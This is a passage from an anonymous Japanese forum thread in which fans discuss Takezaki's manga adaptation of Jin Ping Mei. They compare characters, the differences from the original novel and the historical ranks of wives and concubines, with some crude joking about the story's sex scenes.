憂いをたたえたような表情とかツボだったんじゃない?
事実は単に暗いだけだったかもだけど。

秋菊は大人しくて可愛らしいけど、
憂いはないし。

114 :花と名無しさん:2006/12/06(水) 01:59:56 ID:???0
>>110
ワロタワロタ!

115 :花と名無しさん:2006/12/06(水) 02:00:34 ID:???0
少女と大人の女の違いじゃないのかな
あの性格に加えて多感な年頃の秋菊は
旦那様にしたら繊細すぎて触れるのが怖いとか

116 :花と名無しさん:2006/12/06(水) 05:37:19 ID:???0
春梅はともかく秋菊は手を出したら後の処遇が大変な気がする。
恵蓮みたいな思い上がりやワガママは起こさないだろうけど
一度手を付けられたら
それまでの様に女中格として扱われることを割り切れなくて激しく葛藤しそうだし
かといって奥様格に立て直しても上手くやっていけるとは思えない。
春梅みたいな要領の良さや割り切る思考も出来ないし
雪蛾みたいに技術に裏打ちされたプライドもないからどの道不適応を起こしそう。

117 :花と名無しさん:2006/12/06(水) 11:06:05 ID:???0
秋菊はかわいいけど、竹崎ワールドは
ああいういかにもな夢見る純情乙女に冷たいんだよな・・・
「人魚姫」とか。
秋菊も本人が悪いわけじゃないがあの性格から
金蓮から離れて悲劇に向かうかもしれない伏線が張ってあるね。
読者の反応次第だろうから、回収しない伏線かもしれないけど、
竹崎作品的にはまだそちらの方向に行く可能性は十分あると思う。

118 :花と名無しさん:2006/12/06(水) 15:04:44 ID:???O
旦那様はよくも悪くも「こども」が苦手みたいだしね。

119 :花と名無しさん:2006/12/06(水) 18:29:05 ID:???0
桃のような香りのする痩せこけたガキとか?

だがだんな様は哀れみの心が強い。
平次には負けるけれど。

120 :花と名無しさん:2006/12/06(水) 18:37:15 ID:???0
瓶児の場合は人を哀れんでる自分に酔ってる

121 :花と名無しさん:2006/12/06(水) 19:26:54 ID:???0
そういえば瓶児が「フウさんねぇ・・・」とか馬鹿にしたような
笑い方してたのと金蓮が企んでる〜って台詞があったから、フウのこと何か知ってる
伏線かと思ったけど本当にただ馬鹿にしただけだったんだなw

122 :花と名無しさん:2006/12/06(水) 19:50:48 ID:???0
瓶児って本当に少女マンガの正当ヒロインの王道みたいなキャラですよね。
それを敵の立場において化けの皮をはがしたって感じ。
竹崎先生は本当にキャラクターの描写が上手い。

123 :花と名無しさん:2006/12/06(水) 20:12:42 ID:???0
瓶児の性格には??だけど
自分が男だったら金蓮より瓶児とやってみたいな…

124 :花と名無しさん:2006/12/06(水) 20:13:57 ID:???0
全員とが。

125 :花と名無しさん:2006/12/06(水) 20:55:08 ID:???O
やっと新号と五巻読めた。
この辺から本誌で見た記憶がある。
フウさんが予想以上に悪そうで驚き。

126 :花と名無しさん:2006/12/06(水) 21:09:17 ID:???0
>>123
私も男だったら金蓮より瓶児だな。
きんぺに出てきた全女キャラの中からでも瓶児を選ぶかも

127 :花と名無しさん:2006/12/06(水) 21:40:36 ID:???O
わたしは秋菊としたい。

瓶児はベクトル違うけど本質的には、金蓮と同じと思うな。
女の本能に忠実なとことか

128 :花と名無しさん:2006/12/06(水) 22:36:02 ID:???0
>>127
確かに根っこのところでは似たもの同士かもね。
二人共「女そのもの」っていう感じ。
だから金蓮は瓶児をあんなに憎むのかな。

129 :花と名無しさん:2006/12/06(水) 22:50:06 ID:???0
>>123
>自分が男だったら金蓮より瓶児とやってみたいな…

う〜ん、どーだろ。どんな変態プレイもやらせてもらえるし
汁だくアヘアヘな感じっぷりは男の自尊心が満足できそうだけど、
自分の快感に夢中で基本的にマグロなんじゃないかとも思う>瓶児
金蓮の方がギブアンドテイクで相手を楽しませることも忘れないかも。
エロシーンも瓶児は「エロい」が金蓮は気持良さそうなセックス、と
いう感じがする。
3ジジとのサービスセックルも良かったし。

130 :花と名無しさん:2006/12/06(水) 23:36:49 ID:???0
>>129
同意。
瓶児ってその相手とっていうより
自分の快楽とやってるような感じ。

金蓮は道具=偽物で「旦那様」じゃなきゃ意味なし!って
所が相手重視で好き。

傷ついた旦那様に対する金蓮は
カッコイイ時の旦那様よりも包容力あると思うw

131 :花と名無しさん:2006/12/06(水) 23:37:47 ID:???0
「おしおきです」って自分からフェラチオしてたから一般的に言うマグロではないんじゃないかな>瓶児
金蓮との比較で言えば受身なんだろうけど。
変態プレイって言えば、金蓮も「アナル以外は旦那様の思うがまま」らしいが…

まあ好みの問題だよね。
自分から色々提案してくれるサービス精神旺盛なお姉さまタイプの金蓮か、
旦那様の求めに従順な、お嬢なのにエロいというギャップが嬉しい瓶児か。
二人共、妾としては最高だな。だけど正夫人にはしたくない。

六人の奥様の中では大奥様が一番マグロそうなイメージ。
積極的でテクニカルな大奥様は想像できない。

132 :花と名無しさん:2006/12/07(木) 00:00:21 ID:???0
>大奥様が一番マグロそうなイメージ。

たしかにw
原典じゃ大奥様と旦那様のセックルシーンも結構あって、
金蓮なら「荒れ狂って」なんて言うところを「楽しくすごして」
なんて言われてるあたり、ヘボンにむつまじいんだと思われる。
マンガでビジュアルになると途端に想像しにくくなるな。

133 :花と名無しさん:2006/12/07(木) 00:17:51 ID:???0
原典読んだことないんだけど、「荒れ狂って」ってw
どんだけ激しいセックスだよ
旦那様が髪振り乱してて、バックで荒波が岩に当たって砕けてそうだ

134 :花と名無しさん:2006/12/07(木) 11:06:50 ID:???0
「そこで顛鴛倒鳳といったぐあいになって、淫欲のほども限りなく、
四更ごろまで狂いに狂ってやっと寝につきました」

たまたま見つけた旦那様と瓶児(不倫中)のセックル場面。
このあと昼まで寝て朝飯食ってから酒飲んで今度は騎乗位で再開。

135 :花と名無しさん:2006/12/07(木) 19:12:57 ID:UGojrywD0
>狂いに狂ってやっと寝につきました」

すごいことをやってるらしいのは分かるが、なんかまぬけっぽい。文章のせいか。

136 :花と名無しさん:2006/12/07(木) 20:25:32 ID:???0
ちょっと疑問なんですけど、ふうさんが雪姐さんを身分が低すぎるといってましたよね。
確かにれっきとした令嬢の大奥様や、元金持ち夫人の玉姐さんや瓶児よりは身分低いけど
でも金姐さんだって元餅屋の女房で、その前はただの召使なんだから、厨房上がりの雪姐さんと同じ身分階級だと思うんだけど
だけど金姐さんには最初目をつけてたよね、あのばあさん(姐さんが思い通りになりそうもないからやめただけで)

137 :花と名無しさん:2006/12/07(木) 20:32:20 ID:???0
>>136
雪蛾は飽くまで西門家の中で召使から奥様に昇格された人で
周囲にも前の身分の頃を記憶している人が何人もいる状態で
金蓮は惨めだった昔を直接記憶している人は殆どいない状態だという違いでは。

奥様に昇格したといっても厨房で働き続ける雪蛾の現状を見れば
過去の身分を引きずっている実質は明らかだし。

138 :花と名無しさん:2006/12/07(木) 21:14:58 ID:???0
金蓮はともかく雪蛾の要領の悪さでは
子供を生んでも月娘奥様を凌ぐ立場になんてなれないだろうし
本人もそんな野心は持ってなそう。

雪蛾と嬌児がつるんでいる場面がよくあるけど
多分これはどちらも蔑まれる出自(雪蛾は下女、嬌児は芸妓)で
正妻にはなれない境遇への共感から馴れ合っている心理の表れだと思う。

139 :花と名無しさん:2006/12/08(金) 00:42:52 ID:???O
昔ホラーで描いてた奴の雰囲気も好き。
赤ん坊の肉がものすごくおいしい話とか

140 :花と名無しさん:2006/12/08(金) 10:23:59 ID:???0
金瓶梅以外に何描いてたかもう忘れてしまった。


141 :花と名無しさん:2006/12/08(金) 13:16:46 ID:???0
正妻の地位は絶対なので、子供産もうが寵愛されようが
今いる正妻が死なない限り妾は正妻になれない。
妾が産んだ子も親権は正妻に属する。

春梅も金蓮の死後は周守備の家に妾として買われたけど、
男の子も産んだし寵愛が厚かったから守備の正妻が死んだあと
正妻に直された。
結局どれほど寵愛が篤いかがすべてらしい。

142 :花と名無しさん:2006/12/08(金) 14:45:45 ID:???O
五巻買って来た!

前スレに載せてあった原作での奥様達の年齢と一部違うとこがあった。

原作は玉楼が一番年上だったけど、竹崎版は月娘が一番年上になってるね。

143 :花と名無しさん:2006/12/08(金) 15:51:08 ID:???0
>>129
私なら金蓮だな。瓶児はしつこそう・・・。
旦那さまなら無問題なんだろうけどww



144 :花と名無しさん:2006/12/08(金) 20:10:57 ID:???0
しつこい…濃厚ってことだろうか?確かに声と反応はスゴそうだけど

145 :花と名無しさん:2006/12/08(金) 20:32:27 ID:???0
馮が最後に奥様を一人づつ語ったコマで
雪娥姐さんのラーメン丼みたいな服にウケた。
いやあれが当時普通なのだろうが。

146 :花と名無しさん:2006/12/09(土) 00:58:40 ID:???0
私が男なら瓶児のあえぎ声や乱れる様子に萌えるだろうなあ…と思う
韓予もそのようなことを言ってた

馮ばあさんが大旦那様に歯抜けにされた女の母親で、復讐に来たんだったりして…
と妄想してみたんだけど、それだと前に勤めていた家をめちゃめちゃにする意味がないんだよね。
まさか予行演習だったとも思えない。
あまり軽々しく前の奉公先を潰してしまっては、
大奥様に「ゲンが悪い」と言われたとおり再就職の妨げになるだけだし。


147 :花と名無しさん:2006/12/09(土) 01:34:44 ID:???0
>>136
下女は下女でも、金蓮の場合「奥様付きの下女」だからじゃない?
金蓮が昔働いてたところも相当名家だったみたいだし、
「奥様付き」なら厨房の下女とは格が違うんじゃないかなぁ。

148 :花と名無しさん:2006/12/09(土) 03:22:25 ID:???O
素朴な疑問なんだけど、各奥様方の部屋付き召使は各一人ずつなのに
なんで金蓮は春梅・秋菊の二人なんだろ。
まだ少女だから二人で一人前扱いなのかな?

149 :花と名無しさん:2006/12/09(土) 07:43:54 ID:???0
5巻ゲトー。
やっぱり金蓮姐さんと雪娥姐さんの掛け合いごっつ好き。
あと永鐘の時の「当たってるじゃない」とか。
しかし大奥様がどうやって永鐘から逃れたのかが気になるわ。

150 :花と名無しさん:2006/12/09(土) 08:32:59 ID:???0
>>148
原典じゃ大奥様、玉楼、瓶児もそれぞれ女中・小女2人持ってるんだよね。
大奥様のところは玉蕭・小玉、玉楼は蘭香・小鴛、瓶児は迎春・シュウ春、
嬌児は1人だけ、雪蛾は持ってない。
玉蕭・蘭香・迎春は春梅と同じ年頃で、きれいな着物ももらったり
音楽も仕込まれたりしていて、全員旦那様の手がついている。
竹崎版はそこまで入れると収集つかなくなるwから、金蓮以外は女中1人、
しかも既婚者や年増という設定にしたんじゃないかな。

151 :花と名無しさん:2006/12/09(土) 09:08:05 ID:???0
>全員旦那様の手がついている


改めてヌゲー!と思った原典旦那様w

152 :花と名無しさん:2006/12/09(土) 10:33:06 ID:???0
>>148
大奥様は累計で三人いたよ。
女中頭も奥様付きだし。
春梅が寝込んだとき、金蓮に召使一人貸していたし。
一時期とはいえ実家から変な女呼んでいたし。

>>150
ええ!雪峨、仮にも奥様なのに召使いないの?
それじゃあ身の回りのことは全部一人?カワイソ……。
第四夫人なのに扱い悪いのね……。

153 :花と名無しさん:2006/12/09(土) 10:56:44 ID:???0
奥様とは言い条実質は「お手つき女中の中では別格」て
位置づけだったのかも>雪娥

いくら奥様になったとは言っても
それまで厨房で働いていた女中に
同じ家の中にいた召使を付けようとすれば抵抗が出てくるだろうし
かといって新たに特別召使を買ってきて
雪娥に付けるほどの寵愛は受けていなかったのかもしれない。

一応厨房は受け持っているから
そこにいる召使は雪娥の裁量が利く存在なのだろうな。

154 :花と名無しさん:2006/12/09(土) 12:39:48 ID:???0
>>152
>ええ!雪峨、仮にも奥様なのに召使いないの?
それじゃあ身の回りのことは全部一人?

旦那様が一年ぶりに雪蛾の部屋に行った時、「女中がいないので
部屋の片付けもできません」と言うと、旦那様がじゃあ一人買ってやろう、
と言う。翌日、喜んだ雪蛾がそれを下女に自慢してるのを耳にした
金蓮が、「生意気な」と怒る…なんていう話が。金蓮ヒドス。
雪蛾は奥様とはいえ、同じ衣装を作ってもらえなかったり、外出の時は
留守番してたり、原典でもあからさまに区別されてるのが不思議。
奥様の地位は変わらないはずなのに、やっぱ出自かな。
金蓮みたいに旦那様の寵愛があれば良くしてもらえるんだろうけど、
原典旦那様はもう雪蛾には女として興味はなくて優秀なお勝手係、という
感じだから、待遇も良くなりようがないのかも。

155 :花と名無しさん:2006/12/09(土) 12:46:20 ID:???0
>>154
金蓮も酷いが
>旦那様が一年ぶりに雪蛾の部屋に行った
旦那様もヒドス…

156 :花と名無しさん:2006/12/09(土) 16:17:04 ID:???O
わたなべ版の雪娥はそういう扱いだよね。
本人も「一回お手がついただけなのよ」みたいな事を
あっけらかんと初対面の金蓮に語っていた。
その顔合わせの時も、他の奥様方と違って仕事途中から呼び出されて
慌てて入ってきている。服も使用人のもの。
竹崎版から読んだのであまりのギャップに驚いたw

157 :花と名無しさん:2006/12/09(土) 17:29:50 ID:???0
そんなに扱い酷いのにどうして正式に奥様として向かえたのか不思議。はて?
旦那様の手がついた女中は他にも大勢いたのに、正式に奥様になったってことはそれなりに特別に愛されたからってことじゃないの?
それとも最初手がついたときは愛していたけど短期間の恋で終わったって事?

158 :花と名無しさん:2006/12/09(土) 17:35:26 ID:???0
原典の裏話聞くたびに竹崎版の旦那様が凄くいいひとに思えてくるw
原典では金蓮姐さんもただの人でなしみたいだし。
やっぱり私は竹崎版の女癖悪いけど女に優しい旦那様や、きついけど情に深い姐さんのほうがいいな。
竹崎版では雪蛾姐さんも仕事頑張ってるキャリアウーマンって感じで惨めに見えないから。

159 :花と名無しさん:2006/12/09(土) 18:14:05 ID:???0
>157
同じ下女でも金蓮や春梅らのように
音楽とか教養みたいなもの身につけてなくて
やがて鼻についてきたとか?

竹崎版だと金蓮が「化粧っけもなく、同じ服で
しかめ面で文句ばっかりならそりゃ嫌われるわ」と言ってたから
そういうところが苦手なのかも。
女から見るとしっかり者でかっこよく見えるけど
男からしたら色んな意味で女らしさに欠けて見えるとか。
書き下ろし小話でも旦那様の好意の申し出をはねつけてたし
安眠とのエピソードで「お前が願い事とは珍しい」と言ってたから
旦那様はセツガ姐さんにもっと甘えて欲しいんじゃないかな。
セツガの性格からそれは出来ないんだろうけどね。

160 :花と名無しさん:2006/12/09(土) 18:35:44 ID:???0
>>157
私もその辺りが不思議です。
お手つきの女中がたくさんいる中で
奥様に立て直してもらったのならよほど愛されていたはずなのに
なぜそんなひどい扱いになっているのか、と。

>>158
漫画の旦那さまは後に入るにしたがって毒気が足りなくなってきて
不満がありますけど
金蓮は原典より漫画の方がずっといいですね。
原典の金蓮はあまりにも悪辣で面白いを通り越して嫌悪感を感じる。

161 :花と名無しさん:2006/12/09(土) 23:15:39 ID:???0
原典金蓮よりも竹崎金蓮がいいのは同意だけど、
温の時の甘々な金蓮は嫌だったな。
春梅をお祖母さんに会わせて上げる時のように、
優しくしたいんだけど不器用で、とうしても偽悪的な態度になってしまう金蓮が良い。
金蓮が手放しで優しくなるのは旦那様が落ち込んでるときだけでいいな、と思ってしまう。

162 :花と名無しさん:2006/12/09(土) 23:47:38 ID:???0
温のときの姐さん、めちゃ素敵だと思った…

163 :花と名無しさん:2006/12/10(日) 00:42:04 ID:???O
温のエピソード自体はとても好きなんだけど、整合性を考えたら
キャラじゃない気がしてしまった。
同じ大人しい系の秋菊は扱いに困ってたのに温はいいの?とか。

金蓮に限らず、春梅祖母や金蓮母も偽悪的に親切や優しさ示すのが
すごくかっこよくてほろりときてしまう。
五巻で継母に身売りさせられてた子を呉服屋の養女にしてあげた時も
春梅がお婆さんの元から帰ってきた時も恩着せがましい言い方はしなかったし。
この辺、親切の押し売りして失敗しても最後まで面倒みない瓶児と
うまく比較されてると思った。

164 :花と名無しさん:2006/12/10(日) 00:52:06 ID:???0
>>163
金蓮母はエピソード全体がおどろおどろしくて
あんまり好きになれなかったけど
春梅祖母の月梅の話は好きだった。

好き勝手に生きて老いた女が最後まで好んで歌ったのが
純愛物語の西廂記というのがまた感動的。
琵琶だけは手放さないのも
かつては売れっ子だった芸妓が老いさらばえても琵琶だけは持って
船上で生活していた故事を彷彿させる。

こうして考えてみると竹崎さんて素養が深いですね。

165 :花と名無しさん:2006/12/10(日) 16:07:20 ID:???0
私も金蓮姐さんや旦那様がいい人になり過ぎるのはあまり好きじゃない方だw
金蓮がいい人or正義の仕置き人みたいな役ばっかりだったり、
奥様方が(アホの子の瓶児は除け者にして)和気藹々としている回が続くと、
ちょっとダレてくるなあと。
多少黒くてこそのキンペというか。

166 :花と名無しさん:2006/12/10(日) 16:24:14 ID:???0
>>163
秋菊は既に春梅っていう庇ってくれる同じ立ち場のこもいる。
温の時は金蓮も同じ召使いな立場だったし何より
金蓮は使えていた奥様がワザとイジメたり失敗させるような性根
の人だったらしいから温と秋菊じゃ大人しくても立場が微妙に違うかな

167 :花と名無しさん:2006/12/10(日) 16:27:42 ID:???0
うん。
 金蓮がただの痛快ヒロイン化すると、武大を毒殺した陰惨なエピソードから始まった
金瓶梅の本筋を見失ってしまう気がする。
 イケメン道士が死んだ時に「あんな性悪女(金蓮)を助けるために死ぬなんて…」と
別の奥様がヒソヒソ話してたりとか、一応バランスは取ろうとしているんだろうけどね。


168 :花と名無しさん:2006/12/10(日) 16:29:46 ID:1WBl5FMc0
>>167の「うん」は>>165に向けたものです

169 :花と名無しさん:2006/12/10(日) 17:02:03 ID:???0
>>167
客観的には善人である武大を惨殺したわけですからね>金蓮
本来は第三者であるウンカが復讐に加わるのも
武松への恋心の他に生前の武大が善良で優しい人だったからだし。

170 :花と名無しさん:2006/12/10(日) 18:30:37 ID:???0
え、ぶだいは良い人だったのか。あまり覚えてないな。
 
旦那様がマージャンに嵌る回があったがあんなレベルの顔の女達と一緒にいて
楽しいのかと思ってしまった。サービスの質も奥様方が負けるとは思えない。
この回の背中の皮剥ぐの怖かった。久々に金連って感じだった。
でも最後は金連、婆さんに甘いと言われていたが。

171 :花と名無しさん:2006/12/10(日) 18:43:13 ID:???0
金連は身請けを邪魔した時に永鐘をヤらなかったとこも甘いと思う。

172 :花と名無しさん:2006/12/10(日) 18:54:12 ID:???0
>>170
武大は善人っていうより「毒にも薬にもならない」だとオモ。

キンペ5巻と一緒に発売された「金のがちょう」
触手物wのなかで結構出来がいいと思える夜叉ヶ池が入っていて満足。
カエルの王様の、かぶりもの男も結構思い入れがあるな。

173 :花と名無しさん:2006/12/10(日) 21:18:34 ID:???O
カエルの話はなー。
カエルが美形である必要、なさげ

174 :花と名無しさん:2006/12/10(日) 21:32:20 ID:???0
「神や仏のような男」とまでは行かないけど
普通に善良な市民じゃない?>武大
奥さんを養うために毎日蒸し餅を売って(まあこれは当たり前か)、
金蓮が西門慶の着物を縫いながら「家計の足しになると思って」とコメントすれば妻に感謝する。
妻の浮気相手が大物でも一応男らしく掴みかかる(その後投げ飛ばされるけど)。
弟の武松にはちょっと異様なくらい好かれてるし、ウンカにも親切にしてたみたいだし。

不細工で愚鈍でつまらない男かも知れないけど、それは生まれつきの性質なわけで。
妻に毒を飲まされ足蹴にされるほど、夫として人間として非があった訳ではないのは確か。

それでも、金蓮は自分にふさわしい人生を手に入れるため敢えて外道となることを選んだ。
当初の構想はこういう感じだったと思うけどな。

175 :花と名無しさん:2006/12/10(日) 21:40:02 ID:???O
五巻の秋菊をレイポした男のエピソードでは「犬食い」だったと言われてるね>武大

176 :花と名無しさん:2006/12/10(日) 21:51:26 ID:???0
犬食いかあ。躾がなってないんだなあw
そんな夫と一緒に食べるのは嫌だろうから、
金蓮なら何だかんだ言い訳を考えて巧みに食事時間をずらすかもね


177 :花と名無しさん:2006/12/10(日) 22:02:37 ID:???O
竹崎金梅瓶が現代人の価値観をもって描かれてるのは至極当然の事だけど
一たん、明代の習俗を鑑みると、竹崎武大も哀れなんだよね。
型破りな女房に惚れ込んだのが明代の常識に生きる凡庸な男、武大の不幸というか。


178 :花と名無しさん:2006/12/10(日) 22:37:07 ID:???O
>159
つ ツンデレ

あーいった奥様方ばかりだからこそ雪蛾さんみたいな
毛色が変わったのが欲しいのかも?

179 :花と名無しさん:2006/12/10(日) 23:47:51 ID:???0
武大はつましく善良だけど退屈で弱い俗人、
そういう人間が強い人間に食い物にされるのが、
色と欲が支配する弱肉強食の金瓶梅の世界。
玉楼のいんちき占いが暴露される回に出て来た武大の幽霊のエピなんか、
その典型だと思う。
だから、弱い者を食い物にしている金蓮や旦那様にあまり善人面して欲しく
ないな〜という気もするんだよね。
自分の罪を全部引き受けて、地獄落ちを覚悟で開き直って欲しい。
金蓮姐さんがカッコいいのはそういう時だしな〜

180 :花と名無しさん:2006/12/10(日) 23:57:09 ID:???0
>>179
>色と欲が支配する弱肉強食の金瓶梅の世界。
なんか「悪徳の栄え」を思い出した。
道徳的で善良な人が報われる、教科書どおりの話なんぞうんこ召し上がれ。
で、欲望に忠実であくと非道の限りをつくすことこそ、人間の自然な姿。みたいなww

181 :花と名無しさん:2006/12/11(月) 04:50:03 ID:???0
>>179>>180
田舎娘の蘭香が登場する話は
蘭香の目を通して金蓮たちがいかに凡人にとっては
混沌を抱えた恐ろしい存在であるかが描かれているね。

「蘭香は西門家には残りませんでしたが
一番幸せな女性だったかもしれません」
という語りで結ばれていた。
ここに珍しく作者の竹崎さん本人の主張が物語の前面に出ている印象を受けた。

182 :花と名無しさん:2006/12/12(火) 00:50:20 ID:???0
そういや玉楼付きの召使って蘭香だよね。
名前被ってるんだけど両方原典にも登場するキャラなの?

183 :花と名無しさん:2006/12/12(火) 14:47:37 ID:???0
原典も読んでみたいな。
漫画以上の金連の悪役っぷりをみてみたい。

184 :花と名無しさん:2006/12/12(火) 21:52:41 ID:???0
>>182
恐らく原典に登場する名前を使って
漫画では別の人物を創作したのでしょう。

漫画では金蓮が初めの奉公先で一緒に働いた玉蓮は
金蓮の生き別れの母になっていた。
でも原典での玉蓮は一緒に買われてきた同年輩の少女で若くして病死してしまい
金蓮だけが生き残って主人の寵愛を受ける展開になっている。

185 :花と名無しさん:2006/12/13(水) 00:44:27 ID:???0
竹崎さんは本当にアレンジがうまいんだなぁ。

186 :花と名無しさん:2006/12/13(水) 00:58:05 ID:???0
うんうん。
私は原典から興味もって入ったクチだけど、
主要人物のキャラの解釈はもちろん、
大勢いる脇役まで「お、このキャラをこう使うか!」と
思いがけないアレンジが楽しめてすごく面白い。

187 :花と名無しさん:2006/12/13(水) 02:46:12 ID:???0
ああ、原典を知っているとそういう楽しみ方もあるんだね。
興味が出てきたので、取り寄せてみようかな。

188 :花と名無しさん:2006/12/13(水) 13:06:53 ID:???0
数年前に本屋でA4サイズくらいある本見つけた!!
お高くて手がでませんでした(泣)

189 :花と名無しさん:2006/12/13(水) 14:41:26 ID:???O
図書館やオークションは?
ヤフオクとかでよく出ている。

私は読みたいとは思うけど金蓮が悪辣とか聞くと二の足を踏む。
そういう意味ではわたなべ版は原典に忠実なのかな。

190 :花と名無しさん:2006/12/13(水) 17:33:22 ID:???0
それを言ったら原典はまともな人間は一人もいないw
瓶児はけなげなヒロイン風だけど浮いちゃってるし、
大奥様も怒りっぽくて人間くさい。
本当に好人物に描かれているのは玉楼ぐらいかも。
でも道徳ははじめからナッシングな世界なので、
そういう人物たちがそれなりに魅力的に見えてくる。
私は原典金蓮も好きだ。

191 :花と名無しさん:2006/12/14(木) 19:30:51 ID:???0
フウを瓶児付きにする場面で
大奥様は「ありがとうみんな賛成してくれて」って言ってるけど、
金蓮一人だけ明らかに反対してるよね…
ゴリ押しで全会一致にする月娘様萌え

192 :花と名無しさん:2006/12/14(木) 20:42:16 ID:6vM1n0WW0
私が月娘なら今まで問題ばかりを起こす瓶児には
フウに見張ってもらいたい。

金蓮がいくら反対しても、それ以上に瓶児の問題ごとを何とかして欲しい。
さすが、月娘さま・・・萌えです。
旦那、もっと正妻を大切にしてよ。

193 :花と名無しさん:2006/12/14(木) 20:48:03 ID:???0
デラックスに大旦那さまの話が再録されてたから又読んだ。
結局、青琴のことはどこに真実があるのかぼかされてたけど、
金蓮の旦那様への思いやりがすごく良かったよー。
あと大旦那様と旦那様、ちゃんと顔つき(というか目のあたり)が
似てるんだよね。血がつながってるって直感的に分かる。
そういうところ、竹崎さんて凄いなって思う。

194 :花と名無しさん:2006/12/14(木) 21:46:08 ID:???0
>>192
西門家は石ころ蹴ればトラブル起こるってくらい凄まじいところだからね。
月娘様自身、とんでもない親戚の姐さんを預かったり、おかしな召使いを金蓮に貸したり…
問題解決能力の一番低い瓶児に一番頼りになりそうなフウばあを付けるのは妥当。
金蓮の瓶児に対する感情なんて大奥様はとっくに見抜いてるだろうし、金蓮の意見をシカトするのも納得できるよ。

195 :花と名無しさん:2006/12/14(木) 21:52:39 ID:???0
李嬌児と李桂姐や
月娘と一話登場の従姉(自分が不倫して生んだ子供を西門家に押し付けようとする人)も
一見して血縁だって分かるよね。
髪の色や目つきで。

196 :花と名無しさん:2006/12/14(木) 21:59:54 ID:???0
>>194
>とんでもない親戚の姐さんを

あのヒトって月娘様の親戚じゃなかったら
間違いなく金蓮に殺されるか豚小屋行きだな。

197 :花と名無しさん:2006/12/14(木) 22:03:13 ID:PUTVpQka0
わたしゃ大奥様の前ではすくんで何もできなくなる金蓮萌え。

198 :花と名無しさん:2006/12/15(金) 10:33:52 ID:???0
たしかに萌えた。

199 :花と名無しさん:2006/12/15(金) 18:27:36 ID:???0
>>196
確かに(笑)
仮にもいとこのお姉さんだから煙草折檻だけで済んだけど、そうじゃなかったら……(((( ;゚д゚)))アワワワワ。
しかも商売でも始めなさいと支度金出してもらえるんだから
今まで大奥様や金蓮姐さんに成敗されてきたゲストキャラと比較すると
すごくラッキーだよね。

200 :花と名無しさん:2006/12/15(金) 18:39:27 ID:???O
あれは従姉を救ったんじゃなく、人の良さそうな実の父と
子供のためだったと思っている。

201 :花と名無しさん:2006/12/15(金) 19:12:56 ID:???0
大奥様は世話を引き受けた人間の面倒は最後まで見るんだよ、
どんな奴でも。
転がり込んできてだんな様とねんごろになって想像妊娠した英玉だって、
呆れながら嫁ぎ先まで見つけてたし。
親切だからというより名家の義務としてやってるという感じだが。

202 :花と名無しさん:2006/12/15(金) 20:14:57 ID:???0
>>196
私は根性焼きの時点でもう十分(ヒイッ!)となったよ。
人前で年下の同性にあんなことされたら、肉体的のみならず精神的ダメージも甚大なハズ

>>201
>親切だからというより名家の義務として
確かに。何よりも「西門家のため」だね。
義務さえなければ豚部屋落としを実行してしまう大奥様だもの。
しかし、そこまでしないと秩序を保てない西門家って凄すぎるね。

203 :花と名無しさん:2006/12/15(金) 20:31:22 ID:???0
名家の義務としてだろうけど大奥様はしょうがなく嫌々やっているのではなくて
名家の嫁として責任を全うしようと使命感からって感じから好感もてるんだよね。
義務すらはたさない身勝手な連中が多いから余計にそう思っちゃう

204 :花と名無しさん:2006/12/16(土) 01:18:57 ID:???0
他の奥様は着飾ったり、麻雀したり、鶏をシメたりとか楽しそう?なシーンがあるけど
大奥様はそういうのなかったような・・・。
月娘さまの趣味はなんだろ?

205 :花と名無しさん:2006/12/16(土) 02:21:04 ID:???0
>>204
豚の世話だったりして…

206 :花と名無しさん:2006/12/16(土) 02:42:24 ID:???O
タバコ?
わたなべ版では牡丹の花の栽培が趣味だったな。

207 :花と名無しさん:2006/12/16(土) 09:16:25 ID:???0
そういや原典でも大奥様ってほとんど遊んでないね。
仕事の挨拶回りに行くか、家にいる時は大概よく訪ねてくる兄嫁や尼僧の
もてなしをしていて、あとは体悪くして寝てるw
正妻の体面があるから好き勝手な遊びもできないだろうし。

基本的に、妾は遊び要員、正妻は家事の責任者だから、暮らし方も全然
違うのかも。
妾はおしゃれも仕事だけど、正妻がおしゃれにかまけてたら駄目とか。
藤田あつ子全盛期の煌如星シリーズに、夫に嫌われ妾たちに軽んじられて
夫の喪が明けた時復讐に走る哀れな正妻の話があったよ。
その妾たちの台詞がすごくて、
「だんな様のお相手をして喜ばせるのは私たちなんだもの。
大奥様のやることは召使の指図をして家事を取り仕切るだけ。
家政婦に毛が生えたようなものね」
「家事なんてつまらないでしょうね。私たちはだんな様と一緒に
舟遊びをしたりお酒を飲んだり楽しかったけれど・・・
なんだか正妻って損みたい」

もちろんフィクションだけど、こういうのと比較すると、
悪党の西門慶も奥さん方の扱いはものすごく良かったんだと思う。

208 :花と名無しさん:2006/12/16(土) 11:37:12 ID:???0
正妻と妾でふと思ったんだけど
私は、一夫多妻の金瓶梅の世界においては
正妻以外の奥方の名称が『妾』だと思ってたんです。
でも、たまに「坊ちゃまは六人もの妾をもっている」とかいうし
妾=正妻も含むのか?と思われる台詞が多々あって
大奥様個人をさすときは妻で、妾という単語は使わないけど
6人セットだと全員妾と呼ぶ場面あるし
そのあたりはどうなっているんでしょうか?
妾は今だったらもろ愛人って意味だけけど
この世界では妻と全く同じということなんでしょうか?

209 :花と名無しさん:2006/12/16(土) 12:11:39 ID:???0
>妾=正妻も含むのか?

それはないんじゃないかな。
「坊ちゃまは六人もの妻妾をもっている」を多少わかりやすく「妾」
にして、混乱が生じてしまってるのかと。
昔の中国の妾は夫と婚姻関係にはあるわけで、今の愛人のような
婚外関係ではない。(だいたい、婚外関係=不義密通は刑罰の対象に
なってしまう)
ただ正式な「妻」は正妻だけで、妻と妾の地位は歴然と違う。
ある研究サイトで「一夫多妻制」ではなく正確には「一夫一妻多妾制」が
正しい、とあったけれど、そう考えるとわかりやすいかも。

210 :花と名無しさん:2006/12/16(土) 12:40:52 ID:???0
>>207
復讐の内容も書いてー!
気になるよw

211 :花と名無しさん:2006/12/16(土) 13:30:01 ID:???0
>>209
でも紅楼夢(清代中期)を読んでいたら
既に正妻と妾が一人いる男性の下にある女性が嫁ぐのに際し
「妾ではなくちゃんと妻として嫁がせてくださいね」
と親戚が騒いで
結局「第二夫人」として嫁いだ、というくだりがあったけど。


212 :花と名無しさん:2006/12/16(土) 13:30:39 ID:???0
>>207
210さん同様、自分も気になります。
ぜひw

213 :花と名無しさん:2006/12/17(日) 16:59:01 ID:???0
残グリデラックスみたいな分厚いのコンビニで買ってきた。
これがうわさの大旦那様か!うわー今までで最悪最強なキャラだね。
旦那さま可愛そうだったな。でも過去はそれとなくわかったけどなんで
女物の服着てるんだろう?瓶児も今までで一番ひどいアホの子っぷりだったな。
